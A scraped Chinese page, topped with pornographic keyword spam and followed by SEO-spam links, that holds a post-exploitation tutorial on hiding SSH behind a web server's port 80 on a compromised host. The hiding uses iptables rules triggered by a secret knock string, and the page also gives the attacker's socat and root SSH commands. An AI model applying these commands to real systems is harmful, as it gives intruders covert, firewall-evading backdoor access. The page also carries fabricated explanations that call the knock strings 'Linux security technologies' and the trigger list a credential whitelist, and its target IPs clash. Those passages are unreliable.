国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

化妝品網(wǎng)站建設(shè)報(bào)告網(wǎng)店運(yùn)營(yíng)公司

化妝品網(wǎng)站建設(shè)報(bào)告,網(wǎng)店運(yùn)營(yíng)公司,c語言哪個(gè)網(wǎng)站可以做測(cè)試題,網(wǎng)站維護(hù)服務(wù)費(fèi)作者名:白晝安全主頁面鏈接: 主頁傳送門創(chuàng)作初心: 以后賺大錢座右銘: 不要讓時(shí)代的悲哀成為你的悲哀專研方向: web安全,后滲透技術(shù)每日雞湯: 精彩的人生是在有限的生命中實(shí)現(xiàn)無限價(jià)值端口復(fù)用是…
作者名:白晝安全
主頁面鏈接: 主頁傳送門
創(chuàng)作初心: 以后賺大錢
座右銘: 不要讓時(shí)代的悲哀成為你的悲哀
專研方向: web安全,后滲透技術(shù)
每日雞湯: 精彩的人生是在有限的生命中實(shí)現(xiàn)無限價(jià)值

端口復(fù)用是指不同的應(yīng)用程序使用相同端口進(jìn)行通訊。

我們可以通過端口復(fù)用來達(dá)到隱藏端口的目的。其他作用還有很多,如內(nèi)網(wǎng)滲透中,搭建隧道時(shí),服務(wù)器僅允許指定的端口對(duì)外開放。利用端口復(fù)用可以將3389或22等端口轉(zhuǎn)發(fā)到如80端口上,以便外部連接。

1. 利用IPTables進(jìn)行端口復(fù)用

假設(shè)主機(jī)開放的web服務(wù)是80端口,在目標(biāo)主機(jī)上執(zhí)行如下命令

# 創(chuàng)建端口復(fù)用鏈
iptables -t nat -N LETMEIN# 創(chuàng)建端口復(fù)用規(guī)則,將流量轉(zhuǎn)發(fā)至 22 端口
iptables -t nat  -A LETMEIN -p tcp -j REDIRECT --to-port 22#開啟開關(guān),如果接收到一個(gè)含有 threathuntercoming 的 TCP 包,則將來源 IP 添加到加為 letmein 的列表中
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT#關(guān)閉開關(guān),如果接收到一個(gè)含有 threathunterleaving 的 TCP 包,則將來源 IP 從 letmein 的列表中移除
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT# let's do it,如果發(fā)現(xiàn) SYN 包的來源 IP 處于 letmein 列表中,將跳轉(zhuǎn)到 LETMEIN 鏈進(jìn)行處理,有效時(shí)間為 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
ThreatHunterLeaving是一種Linux安全技術(shù),它可以幫助系統(tǒng)管理員發(fā)現(xiàn)和響應(yīng)潛在的安全威脅。它使用一系列的安全技術(shù),如防火墻,入侵檢測(cè)系統(tǒng),審計(jì)日志,網(wǎng)絡(luò)監(jiān)控等,來幫助系統(tǒng)管理員發(fā)現(xiàn)和響應(yīng)潛在的安全威脅。
ThreatHunterComing是一種Linux安全技術(shù),它可以幫助系統(tǒng)管理員預(yù)防和響應(yīng)潛在的安全威脅。它使用一系列的安全技術(shù),如防火墻,入侵檢測(cè)系統(tǒng),審計(jì)日志,網(wǎng)絡(luò)監(jiān)控等,來幫助系統(tǒng)管理員預(yù)防和響應(yīng)潛在的安全威脅。
LetMeIn列表是一個(gè)安全白名單,它包含了可以訪問系統(tǒng)的IP地址,用戶名和密碼。它可以幫助系統(tǒng)管理員控制哪些用戶可以訪問系統(tǒng),以及他們可以做什么。

2、攻擊者的linux系統(tǒng)上執(zhí)行如下

#開啟復(fù)用,192.168.149.133為目標(biāo)ip
echo threathuntercoming | socat - tcp:192.168.149.133:80#ssh使用80端口進(jìn)行登錄
ssh -p 80 root@192.168.149.133 -T /bin/bash -i#關(guān)閉復(fù)用,此時(shí)不能用80端口進(jìn)行ssh連接
echo threathunterleaving | socat - tcp:192.168.110.131:80

連接目標(biāo)80端口成功連接ssh

ps:進(jìn)行端口復(fù)用后同時(shí)也可以用默認(rèn)的22端口進(jìn)行ssh連接,并不會(huì)影響

http://aloenet.com.cn/news/30930.html

相關(guān)文章:

  • 站長(zhǎng)統(tǒng)計(jì)導(dǎo)航窗口如何搭建網(wǎng)站平臺(tái)
  • 七星網(wǎng)絡(luò)網(wǎng)站軟文范例大全500
  • 有做網(wǎng)站的公司嗎長(zhǎng)沙seo推廣外包
  • 漯河百度做網(wǎng)站電話360推廣登錄入口
  • 青島網(wǎng)站開發(fā)廊坊今日頭條新聞
  • 網(wǎng)站開發(fā)的工作流程chrome下載
  • 網(wǎng)站開發(fā)億瑪酷定制快速排名教程
  • wordpress連接丟失百度seo關(guān)鍵詞排名推薦
  • 哪個(gè)網(wǎng)站做網(wǎng)銷更好網(wǎng)站頁面的優(yōu)化
  • 手機(jī)做直播官方網(wǎng)站西安seo關(guān)鍵詞排名優(yōu)化
  • 禹州做網(wǎng)站bz3399百度一下你就知道百度官網(wǎng)
  • 蘭州市建設(shè)廳網(wǎng)站2021年經(jīng)典營(yíng)銷案例
  • eclipse做網(wǎng)站怎么優(yōu)化網(wǎng)站性能
  • 什么網(wǎng)站可以做兼職美工教育培訓(xùn)報(bào)名
  • 標(biāo)書制作員工資很低嗎seo關(guān)鍵詞排名優(yōu)化費(fèi)用
  • 做網(wǎng)站營(yíng)銷蘭州seo外包公司
  • 四川成都私人網(wǎng)站建設(shè)百度問答app下載
  • 企業(yè)網(wǎng)站建設(shè)個(gè)人博客2345網(wǎng)址導(dǎo)航設(shè)為主頁
  • 公司做網(wǎng)站流程快速seo關(guān)鍵詞優(yōu)化技巧
  • 幫人做網(wǎng)站一個(gè)多少錢環(huán)球網(wǎng)疫情最新動(dòng)態(tài)
  • 廣東省住房和建設(shè)局官方網(wǎng)站百度搜索引擎工作原理
  • 小說主題+wordpressseo網(wǎng)站優(yōu)化知識(shí)
  • 個(gè)人手機(jī)網(wǎng)站開發(fā)站長(zhǎng)工具日本
  • 網(wǎng)站雙語怎么做免費(fèi)的編程自學(xué)網(wǎng)站
  • 鮮花網(wǎng)站建設(shè)的目標(biāo)百度賬號(hào)
  • 企業(yè)建站平臺(tái)哪個(gè)好深圳有實(shí)力的seo公司
  • 網(wǎng)站規(guī)劃與建設(shè)步驟愛站網(wǎng)收錄
  • 網(wǎng)站建設(shè) 柳州青島網(wǎng)站建設(shè)微動(dòng)力
  • 個(gè)人網(wǎng)站設(shè)計(jì)與制作設(shè)計(jì)思路合肥網(wǎng)絡(luò)推廣有限公司
  • wordpress 網(wǎng)銀支付seo專業(yè)培訓(xùn)課程